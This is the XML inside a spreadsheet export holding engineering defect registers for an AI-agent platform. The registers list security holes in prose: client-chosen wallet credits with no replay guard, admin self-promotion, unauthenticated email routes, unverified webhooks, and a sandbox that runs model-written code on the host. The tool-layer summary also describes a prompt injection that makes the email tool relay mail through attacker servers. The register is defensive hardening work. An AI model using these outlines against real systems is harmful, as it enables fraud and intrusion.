  mental model section teaches a feature that does not run.
- **[ON-06](#on-06--the-first-change-exercise-targets-a-deprecated-tool-through-an-unwired-gate)** —
  the guided first task exercises a function nothing calls, on a tool that should be
  deleted.</t>
  </si>
  <si>
    <t>CTX-232</t>
  </si>
  <si>
    <t>## 2. T0 — The documented setup does not work</t>
  </si>
  <si>
    <t>CTX-233</t>
  </si>
  <si>
    <t>## 3. T1 — The onboarding teaches the wrong model</t>
  </si>
  <si>
    <t>CTX-234</t>
  </si>
  <si>
    <t>## 4. T2 — Stale references
| ID | Problem | Notes | Status |
|---|---|---|---|</t>
  </si>
  <si>
    <t>CTX-235</t>
  </si>
  <si>
    <t>CTX-236</t>
  </si>
  <si>
    <t>## 5. T3 — Glossary and navigation</t>
  </si>
  <si>
    <t>CTX-237</t>
  </si>
  <si>
    <t>CTX-238</t>
  </si>
  <si>
    <t>## 7. Suggested order of work
| Step | Work | Why here |
|---|---|---|
| **1** | ON-02, ON-01 | Fix `.env.example`, then fold the two missing steps into the setup |
| **2** | ON-I1 — one bootstrap script | Replaces the whole day-one section with a command |
| **3** | ON-I4 / ON-05, ON-17 | Correct the mental model. The most expensive defect to leave in place |
| **4** | ON-I6 / ON-10, ON-11, ON-13 | Delete the two traps and fix the stale README |
| **5** | ON-I3 / ON-06 | Replace the first-change exercise with a real, useful task |
| **6** | ON-I2 — the doctor command | Serves new developers and on-call equally |
| **7** | ON-I5, ON-I9 | Link the registers; teach how to verify a change runs |
| **8** | ON-I7 / ON-09 | Extract from `agent_loop.py` before the next contributor hits the cap |
---</t>
  </si>
  <si>
    <t>CTX-239</t>
  </si>
  <si>
    <t>## Where to go next
- [20 — Developer onboarding &amp; glossary](../20-onboarding-and-glossary.md) — the source
  document.
- [`README.md`](../README.md) — the documentation index this register set sits under.
- [`DEFECT-REGISTER.md`](../DEFECT-REGISTER.md) — the platform-wide list.
- [18 — Infrastructure](18-INFRASTRUCTURE-AND-DEPLOYMENT-DEFECTS.md) — the full setup and
  operations picture behind ON-01 to ON-03.
- [08 — Memory &amp; CORTEX](08-MEMORY-AND-CORTEX-DEFECTS.md) — MC-01, the defect behind
  ON-05.
- [19 — Testing](19-TESTING-DEFECTS.md) — TS-I7, the check that would catch the
  "never called" pattern ON-I9 warns about.</t>
  </si>
  <si>
    <t>CTX-240</t>
  </si>
  <si>
    <t>Defect Register — Index</t>
  </si>
  <si>
    <t># Defect Register — Index
&gt; **What this folder is:** one defect register per numbered engineering document, plus a
&gt; deep pass over the tool layer. Each file lists what is broken in that module and what
&gt; would make it more efficient.
&gt; **Compiled:** 2026-09-01, against branch `fresh-main`.
&gt; **Context:** there are **no paying tenants**. Nothing here is a production emergency.
&gt; Everything marked T0 should close before the first one.
---</t>
  </si>
  <si>
    <t>README.md</t>
  </si>
  <si>
    <t>CTX-241</t>
  </si>
  <si>
    <t>How to use this folder</t>
  </si>
  <si>
    <t>## How to use this folder
1. **Find the register for the area you are touching** in the table below. Each one maps
   one-to-one onto a document in [`docs/current/`](../).
2. **Read the confidence label on every entry before acting.**
   - ✅ **Verified** — the code was read on 2026-09-01 and the claim held.
   - 📄 **Doc-reported** — a numbered document asserts it and it was not independently
     re-checked. Treat as a high-confidence lead; confirm before you change code.
3. **Re-verify line numbers before editing.** Any commit after 2026-09-01 may have shifted
   them. Grep for the quoted symbol rather than trusting the line.
4. **Work the "Suggested order of work" section**, not tier order. Deletions are free and
   come first in almost every file.
5. **Definition of done for any migration item: the old path is deleted.** A large share of
   these defects exist because a previous migration stopped at "the new thing works".
Every file has the same shape: **defects first, grouped by severity; improvements second.**
The two lists are separate on purpose — a defect is something broken, an improvement is
something that works but costs more than it should.
---</t>
  </si>
  <si>
    <t>CTX-242</t>
  </si>
  <si>
    <t>The registers</t>
  </si>
  <si>
    <t>## The registers
| # | Register | Source document | Defects | Improvements |
|---|---|---|---:|---:|
| 01 | [Product &amp; functional overview](01-PRODUCT-OVERVIEW-DEFECTS.md) | [01](../01-product-overview.md) | 22 | 12 |
| 02 | [System architecture &amp; topology](02-SYSTEM-ARCHITECTURE-DEFECTS.md) | [02](../02-system-architecture.md) | 21 | 10 |
| 03 | [Database &amp; data model](03-DATA-MODEL-DEFECTS.md) | [03](../03-data-model.md) | 20 | 10 |
| 04 | [Auth, RBAC &amp; multi-tenancy](04-AUTH-RBAC-TENANCY-DEFECTS.md) | [04](../04-auth-rbac-tenancy.md) | 22 | 10 |
| 05 | [The agent kernel](05-AGENT-KERNEL-DEFECTS.md) | [05](../05-agent-kernel.md) | 21 | 10 |
| 06 | [Entities &amp; the execution pipeline](06-EXECUTION-PIPELINE-DEFECTS.md) | [06](../06-execution-pipeline.md) | 24 | 10 |
| 07 | [Planning, critics &amp; self-correction](07-PLANNING-AND-CRITICS-DEFECTS.md) | [07](../07-planning-and-critics.md) | 22 | 10 |
| 08 | [Memory, CORTEX &amp; retrieval](08-MEMORY-AND-CORTEX-DEFECTS.md) | [08](../08-memory-and-cortex.md) | 20 | 10 |
| 09 | [Tools &amp; the tool registry](09-TOOLS-DEFECTS.md) | [09](../09-tools.md) | 6 + **[49 deep](TOOL-LAYER-DEFECTS.md)** | 10 |
| 10 | [LLM providers &amp; routing](10-LLM-PROVIDERS-DEFECTS.md) | [10](../10-llm-providers.md) | 24 | 10 |</t>
  </si>
  <si>
    <t>| 11 | [Meta-intelligence &amp; the Board](11-META-INTELLIGENCE-DEFECTS.md) | [11](../11-meta-intelligence.md) | 19 | 10 |
| 12 | [Voice, telephony &amp; messaging](12-VOICE-AND-TELEPHONY-DEFECTS.md) | [12](../12-voice-and-telephony.md) | 21 | 10 |
| 13 | [Gateway &amp; real-time transport](13-GATEWAY-AND-REALTIME-DEFECTS.md) | [13](../13-gateway-and-realtime.md) | 21 | 10 |
| 14 | [Billing, costing &amp; credits](14-BILLING-AND-CREDITS-DEFECTS.md) | [14](../14-billing-and-credits.md) | 25 | 10 |
| 15 | [Governance, HITL &amp; feature flags](15-GOVERNANCE-AND-HITL-DEFECTS.md) | [15](../15-governance-and-hitl.md) | 21 | 10 |
| 16 | [Frontend architecture](16-FRONTEND-DEFECTS.md) | [16](../16-frontend.md) | 23 | 10 |
| 17 | [API reference](17-API-REFERENCE-DEFECTS.md) | [17](../17-api-reference.md) | 20 | 10 |
| 18 | [Infrastructure &amp; deployment](18-INFRASTRUCTURE-AND-DEPLOYMENT-DEFECTS.md) | [18](../18-infrastructure-and-deployment.md) | 21 | 10 |
| 19 | [Testing &amp; quality gates](19-TESTING-DEFECTS.md) | [19](../19-testing.md) | 19 | 10 |
| 20 | [Developer onboarding &amp; glossary](20-ONBOARDING-AND-GLOSSARY-DEFECTS.md) | [20](../20-onboarding-and-glossary.md) | 18 | 10 |
| — | [**Tool layer — deep pass**](TOOL-LAYER-DEFECTS.md) | [09](../09-tools.md) | 49 | — |
**459 defects, 202 improvements.**
Related: [`../DEFECT-REGISTER.md`](../DEFECT-REGISTER.md) is the earlier platform-wide list</t>
  </si>
  <si>
    <t>(45 items, `D-nn`). Every one of its entries reappears in the module register that owns it,
cross-referenced by its `D-nn` id.
---</t>
  </si>
  <si>
    <t>CTX-243</t>
  </si>
  <si>
    <t>The ten findings that matter most</t>
  </si>
  <si>
    <t>## The ten findings that matter most
Ranked by consequence, not by how hard they are to fix. Six of the ten are small changes.
| # | Finding | Where | Why it matters |
|---|---|---|---|
| 1 | **The wallet is credited with an amount the client chooses**, with no replay guard | [BC-01](14-BILLING-AND-CREDITS-DEFECTS.md#bc-01--the-client-chooses-how-much-to-credit-its-own-wallet) | Verify a $1 payment, claim $1000, repeat |
| 2 | **Any admin can promote themselves to `app_admin`** | [AU-01](04-AUTH-RBAC-TENANCY-DEFECTS.md#au-01--any-admin-can-promote-themselves-to-app_admin) | One PATCH; `app_admin` then bypasses every tenant filter |
| 3 | **The email-connection API has no authentication** | [AU-02](04-AUTH-RBAC-TENANCY-DEFECTS.md#au-02--the-email-connection-api-has-no-authentication-at-all) | Five routes managing SMTP/IMAP credentials, open |
| 4 | **CORTEX is write-only** — memory is recorded and never read back into a prompt | [MC-01](08-MEMORY-AND-CORTEX-DEFECTS.md#mc-01--cortex-is-write-only-on-the-live-path) | An agent's tenth run knows what its first run knew |
| 5 | **Three of the four credit gates have no callers** | [BC-05](14-BILLING-AND-CREDITS-DEFECTS.md#bc-05--three-of-the-four-credit-gates-have-no-callers) | No pre-run gate, no in-run breaker. Both are written and tested |</t>
  </si>
  <si>
    <t>| 6 | **No webhook signature is verified, and a failure would not block** | [GW-01](13-GATEWAY-AND-REALTIME-DEFECTS.md#gw-01--no-webhook-signature-is-ever-verified-and-a-failure-would-not-block) | Anyone who can reach the endpoint can run any tenant's agents |
| 7 | **The default sandbox runs LLM-authored code as the backend OS user** | [TL-01](TOOL-LAYER-DEFECTS.md#tl-01--the-default-sandbox-runs-llm-authored-code-as-the-backend-os-user) + [TX-01](09-TOOLS-DEFECTS.md#tx-01--the-per-company-sandbox-flag-is-never-read) | The feature flag says "on"; the runtime default says "off"; off wins |
| 8 | **A run where every step failed can report `COMPLETED`** | [AK-01](05-AGENT-KERNEL-DEFECTS.md#ak-01--a-run-where-every-step-failed-can-report-completed) | Runs that did nothing are billed and counted as successes |
| 9 | **Every retry strategy executes identically** | [PC-06](07-PLANNING-AND-CRITICS-DEFECTS.md#pc-06--every-retry-strategy-executes-identically) | The remedy is chosen, logged, and then dropped |
| 10 | **There is no CI** — the one workflow filters on a directory that no longer exists | [TS-01](19-TESTING-DEFECTS.md#ts-01--the-only-ci-workflow-has-never-fired) | 1,063 tests and three working gates run only when someone remembers |
---</t>
  </si>
  <si>
    <t>CTX-244</t>
  </si>
  <si>
    <t>Five patterns that explain most of the list</t>
  </si>
  <si>
    <t>## Five patterns that explain most of the list
Fixing a pattern is cheaper than fixing its symptoms one at a time.</t>
  </si>
  <si>
    <t>CTX-245</t>
  </si>
  <si>
    <t>1. Built, tested, never called</t>
  </si>
  <si>
    <t>### 1. Built, tested, never called
The single most common shape in this codebase. A module is complete, has unit tests, and
has **no production call site**:
`ToolCostResolver` · `RedisRateLimiter` · `TrustLearner` · `FailurePatternService` ·
`check_credit_gate` · `consume_step_cost` · `check_credit_circuit_breaker` ·
`assemble_memory` · `CortexBridge.get_relevant_knowledge` · `PlanGenerator.replan` ·
`Budget.can_afford` · `get_reasoning` · `get_visible_tools_for_company` ·
`get_tools_for_company` · `EgressProxyManager`
**Being unit-tested is not evidence that a module runs.** Grep for call sites before
assuming a tested module is a live one. The check that would catch this is
[TS-I7](19-TESTING-DEFECTS.md#ts-i7--add-a-declared-but-never-called-check).</t>
  </si>
  <si>
    <t>CTX-246</t>
  </si>
  <si>
    <t>2. Declared but not enforced</t>
  </si>
  <si>
    <t>### 2. Declared but not enforced
A setting is authored in the UI, saved, shown back — and read by nothing. At least eight
feature flags, eight entity-builder settings, `routing_mode`, `max_concurrent_children`,
`max_calls_per_hour`, `max_retries`, `rate_limit_per_run`, `max_recursion_depth`,
`io_contract.input_schema`.
Adding a flag is not the same as wiring a control. See
[EP-05](06-EXECUTION-PIPELINE-DEFECTS.md#ep-05--eight-settings-in-the-builder-have-no-runtime-reader)
and [GH-16](15-GOVERNANCE-AND-HITL-DEFECTS.md#4-t2--feature-flags-that-are-not-controls).</t>
  </si>
  <si>
    <t>CTX-247</t>
  </si>
  <si>
    <t>3. Gates that fail open</t>
  </si>
  <si>
    <t>### 3. Gates that fail open
Credit checks, HITL pub/sub, rate limiting, suspension middleware, semantic duplicate
detection, webhook signatures, anti-sprawl — every one swallows its errors and lets the
request through.
Each was written so a broken control could not break a run. Together they mean **a failing
gate and a passing gate are indistinguishable**. See
[GH-21](15-GOVERNANCE-AND-HITL-DEFECTS.md#gh-21--almost-every-gate-in-the-platform-fails-open).</t>
  </si>
  <si>
    <t>CTX-248</t>
  </si>
  <si>
    <t>4. Half-finished migrations</t>
  </si>
  <si>
    <t>### 4. Half-finished migrations
The new path works and the old one was never deleted: two `ToolResult` classes, two healing
ladders, two RAG paths, two episodic stores, four price tables, two gateways, two config
classes, the `assets` table, `models.py`, the root `tests/`, `phone_pool_router.py`,
`voice/main.py`.
Adopt the rule that would have prevented all of them: **a migration is not done until the
old path is deleted.**</t>
  </si>
  <si>
    <t>CTX-249</t>
  </si>
  <si>
    <t>5. Money tracked in several places and reconciled with max()</t>
  </si>
  <si>
    <t>### 5. Money tracked in several places and reconciled with `max()`
The loop's `Budget`, `run.total_cost_usd` written by nested step code on a different
session, and `usage_logs` written by the critics. Reconciled once per iteration in an order
that is easy to break, with three cost surfaces that write no ledger row at all.
One write path — every spender writes one attributed `usage_logs` row — closes five
separate defects. See
[BC-I3](14-BILLING-AND-CREDITS-DEFECTS.md#bc-i3--one-cost-write-path) and
[AK-I1](05-AGENT-KERNEL-DEFECTS.md#ak-i1--one-cost-write-path).
---</t>
  </si>
  <si>
    <t>CTX-250</t>
  </si>
  <si>
    <t>Where to start</t>
  </si>
  <si>
    <t>## Where to start
If you are picking up hardening work and want the order that produces the most value per
day:
| Phase | Work | Registers |
|---|---|---|
| **1. Turn on the lights** | Fix CI, make skips fail, add gate-failure metrics, add an error boundary | [19](19-TESTING-DEFECTS.md), [18](18-INFRASTRUCTURE-AND-DEPLOYMENT-DEFECTS.md), [15](15-GOVERNANCE-AND-HITL-DEFECTS.md), [16](16-FRONTEND-DEFECTS.md) |
| **2. Close the money and auth holes** | BC-01, BC-02, BC-03, AU-01, AU-02, AU-03, GW-01 | [14](14-BILLING-AND-CREDITS-DEFECTS.md), [04](04-AUTH-RBAC-TENANCY-DEFECTS.md), [13](13-GATEWAY-AND-REALTIME-DEFECTS.md) |
| **3. Clear the ground** | Every T2 deletion across all registers. Free, and it shrinks what everyone else has to reason about | all |
| **4. Call what already exists** | The credit gates, the memory read path, the cost resolver, the two worker jobs | [14](14-BILLING-AND-CREDITS-DEFECTS.md), [08](08-MEMORY-AND-CORTEX-DEFECTS.md), [09](09-TOOLS-DEFECTS.md), [02](02-SYSTEM-ARCHITECTURE-DEFECTS.md) |
| **5. Fix the defaults** | `STREAMING_HOST`, the gateway DB port, `cost_unit`, Redis URL parsing, placeholder secrets | [02](02-SYSTEM-ARCHITECTURE-DEFECTS.md), [10](10-LLM-PROVIDERS-DEFECTS.md) |
| **6. Make the run report the truth** | AK-01, then the single cost write path | [05](05-AGENT-KERNEL-DEFECTS.md), [14](14-BILLING-AND-CREDITS-DEFECTS.md) |</t>
  </si>
  <si>
    <t>| **7. Throughput** | Stop blocking a worker on HITL; enforce the child cap; add LLM retry and timeout | [15](15-GOVERNANCE-AND-HITL-DEFECTS.md), [05](05-AGENT-KERNEL-DEFECTS.md), [10](10-LLM-PROVIDERS-DEFECTS.md) |
| **8. Design work** | Tenancy as a structural boundary, credit holds, the typed tool contract, idempotency | [04](04-AUTH-RBAC-TENANCY-DEFECTS.md), [14](14-BILLING-AND-CREDITS-DEFECTS.md), [09](09-TOOLS-DEFECTS.md) |
---</t>
  </si>
  <si>
    <t>CTX-251</t>
  </si>
  <si>
    <t>Keeping this current</t>
  </si>
  <si>
    <t>## Keeping this current
These registers describe code, so they rot. When you fix something:
1. Mark the entry resolved in its register rather than deleting it — the history is useful.
2. If the fix changes the source document's description, update that document too.
3. If you find a new defect, add it to the register that owns the module, using the next
   free id in that file's prefix.
The four **census checks** in
[IN-I10](18-INFRASTRUCTURE-AND-DEPLOYMENT-DEFECTS.md#in-i10--write-the-four-census-checks)
plus the **never-called check** in
[TS-I7](19-TESTING-DEFECTS.md#ts-i7--add-a-declared-but-never-called-check) are what stop
this list regrowing. Between them they would have caught seventeen of the entries here.</t>
  </si>
  <si>
    <t>CTX-252</t>
  </si>
  <si>
    <t>Tool Layer — Defect Register</t>
  </si>
  <si>
    <t># Tool Layer — Defect Register
&gt; **What this document is:** every actionable defect found in the AI tool layer
&gt; (`backend/src/ai/tools/**`, `tool_executor.py`, the tool paths in `step_executor.py`,
&gt; `tool_management_*`, and the sandbox runtime), triaged and checked against the code
&gt; in this repository.
&gt; **Who should read it:** anyone hardening the tool layer, anyone wiring a new tool,
&gt; and any agent session asked to "fix the tool defects".
&gt; **Compiled:** 2026-08-27, against branch `fresh-main`.
&gt; **Scope note:** this is a deep pass over one subsystem. It supersedes the two
&gt; tool-layer entries in the platform-wide register — see
&gt; [Relationship to `DEFECT-REGISTER.md`](#relationship-to-the-platform-register).
&gt; **Context:** there are **no paying tenants**. Nothing here is a production
&gt; emergency; everything in T0 is a launch blocker.
---</t>
  </si>
  <si>
    <t>CTX-253</t>
  </si>
  <si>
    <t>How to use this in a fresh session</t>
  </si>
  <si>
    <t>## How to use this in a fresh session
This file is written to be self-contained. You should not need the conversation that
produced it.
1. **Every entry here is ✅ Verified.** The code was read on 2026-08-27 and the claim
   held. Unlike the platform-wide register, there are no 📄 Doc-reported entries — each
   defect was confirmed by reading the cited file, not by trusting `09-tools.md`.
2. **Re-verify line numbers before editing.** Any commit after 2026-08-27 may have
   shifted them. Grep for the quoted symbol rather than trusting the line.
3. **Work in the suggested order** ([§7](#7-suggested-execution-order)), not tier
   order. T2 (deletions) is free and comes first.
4. **Most of these are symptoms of four root faults** ([§1.1](#11-the-four-root-faults)).
   Read those before picking up individual items — several fixes collapse into one
   change once the fault is addressed.
5. **Definition of done for any migration item: the old path is deleted.** The tool
   layer has three separate half-finished migrations in it (typed tools, the cost
   resolver, tool resilience), each of which stopped at "the new thing works".</t>
  </si>
  <si>
    <t>CTX-254</t>
  </si>
  <si>
    <t>Provenance</t>
  </si>
  <si>
    <t>### Provenance
Compiled by reading `docs/current/09-tools.md` end to end and then verifying each of
its claims against the code, plus a systematic pass over the 64 `social/` tools, the
sandbox runtime, and the meta/synthesis pipeline. **49 defects**, all verified.
---</t>
  </si>
  <si>
    <t>CTX-255</t>
  </si>
  <si>
    <t>## Contents
1. [Summary](#1-summary)
2. [T0 — Tenant boundary and untrusted code](#2-t0--tenant-boundary-and-untrusted-code)
3. [T1 — Declared but not enforced](#3-t1--declared-but-not-enforced)
4. [T2 — Delete](#4-t2--delete)
5. [T3 — Correctness and robustness](#5-t3--correctness-and-robustness)
6. [T4 — Integrations that report false success](#6-t4--integrations-that-report-false-success)
7. [Suggested execution order](#7-suggested-execution-order)
8. [Relationship to the platform register](#relationship-to-the-platform-register)
---</t>
  </si>
  <si>
    <t>CTX-256</t>
  </si>
  <si>
    <t>## 1. Summary
| Tier | Theme | Count | When |
|---|---|---|---|
| [T0](#2-t0--tenant-boundary-and-untrusted-code) | Tenant boundary and untrusted code | 9 | Before the first paying tenant |
| [T1](#3-t1--declared-but-not-enforced) | Declared but not enforced | 13 | Before relying on the control |
| [T2](#4-t2--delete) | Delete | 8 | **Now** — free, no behaviour change |
| [T3](#5-t3--correctness-and-robustness) | Correctness and robustness | 12 | Needs design; does not block launch |
| [T4](#6-t4--integrations-that-report-false-success) | Integrations that report false success | 7 | Before promoting any social tool |
Three items are worth reading before anything else:
- **[TL-01](#tl-01--the-default-sandbox-runs-llm-authored-code-as-the-backend-os-user)** —
  the default "sandbox" is a host subprocess running as the API process's own user,
  and any Docker failure silently falls back to it.
- **[TL-04](#tl-04--email_send-lets-the-model-override-the-smtp-server-and-password)** —
  a prompt injection can relay mail through attacker-controlled infrastructure under
  the tenant's identity.</t>
  </si>
  <si>
    <t>- **[TL-03](#tl-03--llm-supplied-company_id-is-accepted-as-the-tenant-boundary)** —
  nineteen tools accept the tenant id from the model when execution context is absent.</t>
  </si>
  <si>
    <t>CTX-257</t>
  </si>
  <si>
    <t>1.1 The four root faults</t>
  </si>
  <si>
    <t>### 1.1 The four root faults
Almost every defect below is a symptom of one of these. Fixing them individually is a
treadmill; fixing the four is a rebuild with a finite scope.
| Fault | Description | Symptoms |
|---|---|---|
| **A** — Two registries that never meet | The executable registry is a class-attribute dict built at import time. `tool_registry_entries` is inert metadata with no loader. Neither knows about the other at runtime. | TL-10, TL-14, TL-34, and the platform register's D-20 |
| **B** — Tenancy is a convention, not a boundary | `ToolRegistry.get_tool(name)` is called without `company_id` on every execution path. Nineteen tools fall back to an LLM-supplied `company_id`. | TL-03, TL-05, TL-06, TL-07, TL-09, TL-10 |
| **C** — Policy declared in one place, enforced in none | Status gate, `is_enabled`, `NetworkPolicy`, `rate_limit_per_run`, `max_execution_seconds`, `permissions`, `ToolCostResolver`, `RedisRateLimiter` — all fully written, unit-tested, zero production call sites. | TL-11 through TL-22 |
| **D** — The contract is a string with four dispatch paths | `run`, `run_with_context`, `run_typed`, plus the executor's reflection fallback. Structured arguments are serialised to JSON and re-parsed inside each tool. | TL-05, TL-30, TL-41 |
---</t>
  </si>
  <si>
    <t>CTX-258</t>
  </si>
  <si>
    <t>## 2. T0 — Tenant boundary and untrusted code
These decide whether one tenant's data is reachable by another, and whether
LLM-authored code can reach the host. Several are one-line fixes.</t>
  </si>
  <si>
    <t>CTX-259</t>
  </si>
  <si>
    <t>## 3. T1 — Declared but not enforced
Each of these reads as a control in the code and the admin UI. None of them is one.
Every item is a decision: **wire it in or delete it**, but do not leave it looking
functional.</t>
  </si>
  <si>
    <t>CTX-260</t>
  </si>
  <si>
    <t>## 4. T2 — Delete
**Do these first.** Every item is dead, superseded, or written against an API that
cannot be called. Removing them shrinks the surface everyone else has to reason about —
the cheapest risk reduction available. Together they take the registry from 98 tools to
roughly 86, and remove ~1,600 lines.
| ID | Delete | Notes | Status |
|---|---|---|---|</t>
  </si>
  <si>
    <t>CTX-261</t>
  </si>
  <si>
    <t>&gt; Before each deletion, confirm there is no remaining importer:
&gt; `grep -rn "&lt;module_name&gt;" backend/src frontend/src --include=*.py --include=*.ts --include=*.tsx`
See also **D-25** in the platform register — the `video_generation` deprecated shim,
which belongs to this tier and is already recorded there.
---</t>
  </si>
  <si>
    <t>CTX-262</t>
  </si>
  <si>
    <t>## 5. T3 — Correctness and robustness</t>
  </si>
  <si>
    <t>CTX-263</t>
  </si>
  <si>
    <t>## 6. T4 — Integrations that report false success
These are the worst failure mode in the tool layer: the tool returns
`{"success": true, ...}` and a reassuring message, the agent proceeds as though the work
is done, and nothing happened. They cannot be found by monitoring error rates.
All are `EXPERIMENTAL`, and per [TL-13](#tl-13--the-tool-status-gate-is-not-wired-into-execution)
that status does not stop them running.</t>
  </si>
  <si>
    <t>CTX-264</t>
  </si>
  <si>
    <t>7. Suggested execution order</t>
  </si>
  <si>
    <t>## 7. Suggested execution order
Ordered by dependency and cost, not by tier.
| Step | Work | Why here |
|---|---|---|
| **1** | **T2 deletions** — TL-23 to TL-29 | Free. Nothing that is not already broken can break. Removes 12 tools and ~1,600 lines before anyone has to reason about them |
| **2** | **The one-line T0 fixes** — TL-03, TL-04, TL-06, TL-05 | Each closes a live tenant-boundary hole and none needs design. TL-04 in particular is a parameter deletion |
| **3** | **TL-07, TL-08, TL-31** | Small, isolated, no architectural dependency |
| **4** | **TL-16 — the durable workspace** | The prerequisite for everything in the sandbox tier. Nothing else in step 5 can land without it |
| **5** | **Sandbox hardening** — TL-01, TL-15, TL-17, TL-18, TL-02, TL-36, TL-42 | Flip the container default only once these are done. Delete the silent `SubprocessRuntime` fallback in the same change |
| **6** | **One resolution entry point** — TL-10, TL-13, TL-14, TL-12, TL-11, TL-21 | Six dead gates become six lines in one function. Make `ToolRegistry` private in the same change |
| **7** | **One execution path** — TL-41, TL-30, TL-05, TL-19, TL-33, TL-20, TL-37, TL-39 | Cost, retry, backoff, circuit-breaking and audit move into the base class. Migrate tools family by family, highest-effect first: email, CRM, social |
| **8** | **TL-09 — reference-argument discipline** | The largest single change. Needs the typed contract from step 7 to exist first |</t>
  </si>
  <si>
    <t>| **9** | **T4 integration repairs** — TL-43 to TL-49 | Only worth doing per platform, immediately before promoting that platform out of `EXPERIMENTAL` with a live credential smoke test |</t>
  </si>
  <si>
    <t>CTX-265</t>
  </si>
  <si>
    <t>Guardrails</t>
  </si>
  <si>
    <t>### Guardrails
- **Ship behavioural changes behind a feature flag.** The platform has entity → company
  → env → default resolution in
  [`core/feature_flags.py`](../../../backend/src/ai/core/feature_flags.py). Note that
  three flags in this area are already dead — `tools.cost_resolver_v2_enabled` is never
  read, and `tools.experimental.*` gates a function nothing calls. Adding a flag is not
  the same as wiring a control.
- **A tool is not "done" until its advertised schema matches what `execute` reads.**
  TL-43, TL-46 and TL-47 are all the same bug. A contract test over every registered
  tool would have caught all three.
- **Do not promote a social tool without a live credential smoke test.** Every T4 defect
  would have been caught by one real call.
- **Recommended surface reduction:** 64 social tools → roughly 20. Delete `quora`,
  `x_ads` and `youtube_ads` (12 tools); hold `meta_ads`, `linkedin_ads`,
  `linkedin_sales_nav` and `snapchat_ads` behind a real gate; promote `linkedin`,
  `facebook`, `instagram`, `twitter` and `google_ads` one at a time. Maintaining 64
  unverified integrations costs more than the five that will be used.
---</t>
  </si>
  <si>
    <t>CTX-266</t>
  </si>
  <si>
    <t>Relationship to the platform register</t>
  </si>
  <si>
    <t>## Relationship to the platform register
[`../DEFECT-REGISTER.md`](../DEFECT-REGISTER.md) is the platform-wide list compiled from
all 20 numbered documents. Two of its entries fall inside this subsystem and are
**superseded** by the deeper treatment here:
| Platform entry | Superseded by | Change |
|---|---|---|
| **D-20** — A custom tool created through the API is inert | [TL-10](#tl-10--tenant-scoped-tools-are-unreachable-by-construction), [TL-14](#tl-14--is_enabled--false-does-not-disable-anything), Fault A | Was 📄 Doc-reported; now ✅ Verified. The root cause is broader than "no loader" — tenant-scoped tools are unreachable even when a runtime object exists |
| **D-25** — The `video_generation` tool | [TL-13](#tl-13--the-tool-status-gate-is-not-wired-into-execution), T2 | Unchanged; still a valid deletion. The reason it is still selectable is TL-13 |
Everything else in this file is new and does not appear in the platform register.
---</t>
  </si>
  <si>
    <t>CTX-267</t>
  </si>
  <si>
    <t>## Where to go next
- [09 — Tools &amp; the tool registry](../09-tools.md) — the subsystem reference these
  defects were found against.
- [15 — Governance, HITL &amp; feature flags](../15-governance-and-hitl.md) — the
  `FeatureFlags` service behind the gates in T1.
- [14 — Billing, costing &amp; credits](../14-billing-and-credits.md) — where the four
  price tables in TL-19 are supposed to converge.
- [18 — Infrastructure &amp; deployment](../18-infrastructure-and-deployment.md) — building
  and pinning the `hb-sandbox` and `hb-egress-proxy` images for the T1 sandbox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</si>
</sst>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sz val="10"/>
      <color rgb="FF1F2937"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="16"/>
      <color rgb="FF243D57"/>
      <name val="Arial"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <color rgb="FF4B5563"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FFFFFFFF"/>
      <name val="Arial"/>
    </font>
  </fonts>
  <fills count="4">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF243D57"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFFFF"/>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vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="1" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="right" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="164" fontId="1" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="right" vertical="top" wrapText="1"/>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1" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
  </cellXfs>
  <cellStyles count="1">
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="3">
    <dxf>
      <font>
        <b/>
        <color rgb="FF991B1B"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <bgColor rgb="FFFEE2E2"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <color rgb="FF991B1B"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <bgColor rgb="FFFEE2E2"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FF475569"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <bgColor rgb="FFF1F5F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solidatedDefects" displayName="ConsolidatedDefects" ref="A6:P934" totalsRowShown="0">
  <autoFilter ref="A6:P934" xr:uid="{00000000-0009-0000-0100-000001000000}">
    <filterColumn colId="2">
      <filters>
        <filter val="Context"/>
      </filters>
    </filterColumn>
  </autoFilter>
  <tableColumns count="16">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0000-000001000000}" name="ID"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0000-000002000000}" name="Title / affected surface"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0000-000003000000}" name="Record type"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0000-000004000000}" name="Register / module"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0000-000005000000}" name="Tier"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0000-000006000000}" name="Severity"/>
    <tableColumn id="7" xr3:uid="{00000000-0010-0000-0000-000007000000}" name="Confidence (source)"/>
    <tableColumn id="8" xr3:uid="{00000000-0010-0000-0000-000008000000}" name="Full source details (1 of 3)"/>
    <tableColumn id="9" xr3:uid="{00000000-0010-0000-0000-000009000000}" name="Full source details (2 of 3)"/>
    <tableColumn id="10" xr3:uid="{00000000-0010-0000-0000-00000A000000}" name="Full source details (3 of 3)"/>
    <tableColumn id="11" xr3:uid="{00000000-0010-0000-0000-00000B000000}" name="Source references →"/>
